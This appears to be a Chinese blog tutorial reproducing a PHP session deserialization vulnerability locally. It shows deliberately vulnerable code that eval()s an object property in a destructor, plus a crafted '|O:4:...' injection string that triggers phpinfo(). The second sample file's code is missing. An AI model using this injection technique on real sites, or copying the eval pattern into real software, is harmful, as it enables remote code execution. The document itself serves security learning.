php session 反序列化,PHP SESSION反序列化本地样例分析
PHP SESSION反序列化本地样例分析
0X00漏洞原因
主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);
ini_set(‘session.serialize_handler’, ‘php’);
两者处理session的方式不同。
0X01漏洞分析
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法
0X02漏洞环境
Windows10
Phpstudy一件集成环境
0X03漏洞复现
首先现在本地phpstudy网站根目录新建俩个测试用例1.php和2.php
内容分别为
1.php:
ini_set('session.serialize_handler', 'php');
session_start();classtest {var$hi;
function __construct(){
$this->hi = 'phpinfo();';
}
function __destruct() {
eval($this->hi);
}
}?>
2.php:
漏洞利用
首先构造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}
可以看到2.php中接收的参数为a
提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},
也就是访问127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},
访问后结果如下:
然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()
0X04漏洞分析
提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;},
传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}
此时访问1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value,然后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。
php session 反序列化,PHP SESSION反序列化本地样例分析相关推荐
- Leetcode怎么调试java代码,IDEA2020.1使用LeetCode插件运行并调试本地样例的方法详解...
环境: idea2020.1 插件: LeetCode-editor 6.7 一.IDEA安装LeetCode插件 安装完成重启idea 打开插件 URL可以选择国服和世界服.LoginName和Pa ...
- 关于谷歌浏览器主页被篡改无法修正的样例分析与解决方案
关于谷歌浏览器主页被篡改无法修正的样例分析与解决方案 首先写在前面,浏览器被修改主页的情况很多,此次分析的仅为一个样例且给出解决的方法.本文主要提供自身经历和解决的思路,因为水平有限,无法给出专业化的 ...
- 斗地主AI算法——第十六章の样例分析
上一章,我们已经完成了测试模块的开发.至此我们已经可以进行整体测试了.本章主要内容就是对随机生成的对局情况进行简单的分析. 实际上整个开发过程绝大部分时间都是用在样例分析上,通过样例给出的返回操作分析 ...
- [LoadRunner]LR性能测试结果样例分析
LR性能测试结果样例分析 测试结果分析 LoadRunner性能测试结果分析是个复杂的过程,通常可以从结果摘要.并发数.平均事务响应时间.每秒点击数.业务成功率.系统资源.网页细分图.Web服务器资源 ...
- V4L2-PCI驱动程序样例分析(一)
V4L2-PCI驱动程序样例分析 文章目录 V4L2-PCI驱动程序样例分析 一.简介 二.驱动头文件和基础数据机构定义 三.PCI驱动框架骨架 四..probe详解 1.定义probe过程所需要的结 ...
- RPM安装包-Spec文件參数具体解释与演示样例分析
spec文件是整个RPM包建立过程的中心,它的作用就如同编译程序时的Makefile文件. 1.Spec文件參数 spec文件包括建立一个RPM包必需的信息,包括哪些文件是包的一部分以及它们安装在哪个 ...
- Netty 简单样例分析(io传输的框架)
http://linugb118.blog.51cto.com/272628/420738 messageReceived(ChannelHandlerContext ctx, MessageEven ...
- 【原创】一个简单的StreamInsight样例分析:MarketMonitor
MarketMonitor是2009年微软专业开发者大会上StreamInsight小组资深程序经理Torsten Grabs演讲中的第一个StreamInsight Demo.这个Demo演示了如何 ...
- Netty简单样例分析[转]
转自:http://linugb118.blog.51cto.com/272628/420738 Netty 是JBoss旗下的io传输的框架,他利用java里面的nio来实现高效,稳定的io传输. ...
最新文章
- 当RxJava遇到AOP
- QWidget子窗口中setStyleSheet无效,解决方法
- 转:Java学习路线图,专为新手定制的Java学习计划建议
- 以新ICT构建全联接的电力物联网,迈入能源智能时代
- web服务器获取项目路径问题,读取web项目properties文件路径 解决tomcat服务器找不到properties路径问题...
- 如何注册鸿蒙id,鸿蒙系统真机调试证书 和 设备ID获取
- JAVA如何隐藏异常堆栈_java – 如何在控制台上停止打印异常堆栈跟踪?
- 信息学奥赛一本通(1324:【例6.6】整数区间)
- oracle心间directory并附权,【Oracle】第一章创建授权
- mysql相交_PHP-Mysql相交结果
- 详解 MySQL 基准测试和 sysbench 工具
- 用java怎么做微信公众号,用Java搭建微信公众号(一)构建基础请求框架
- python中变量名有哪些
- java一天一只顽猴想去从山脚_异乡苦境救顽猴
- 黑白双煞拆装箱 -- 八大基本类型及其封装类
- CommonUtils 工具类
- 内核通知链(网络子系统为例)
- 【网络篇】第十七篇——IP协议详解
- 没有发布服务器的 rpc 安全信息,或该信息无效,SQLServer之创建分布式事务
- Shell脚本中点号+文件名的作用
热门文章
- dbms_DBMS | 并发控制
- 2021年终总结:30多岁依然没有放弃自我成长!
- 近100个Spring/SpringBoot常用注解汇总!
- nodejs与javascript中的aes加密
- python 控制手机摄像头_python+open cv调用手机摄像头,保存文件
- 非线性最优化(二)——高斯牛顿法和Levengerg-Marquardt迭代
- python传中文参数_解决Python传递中文参数的问题
- java smp_什么是SMP系统
- java @valid 密码不一致_一个成熟的Java项目如何优雅地处理异常
- 佳能g3800故障灯说明书_佳能打印机故障如何维修 佳能打印机故障维修方法【介绍】...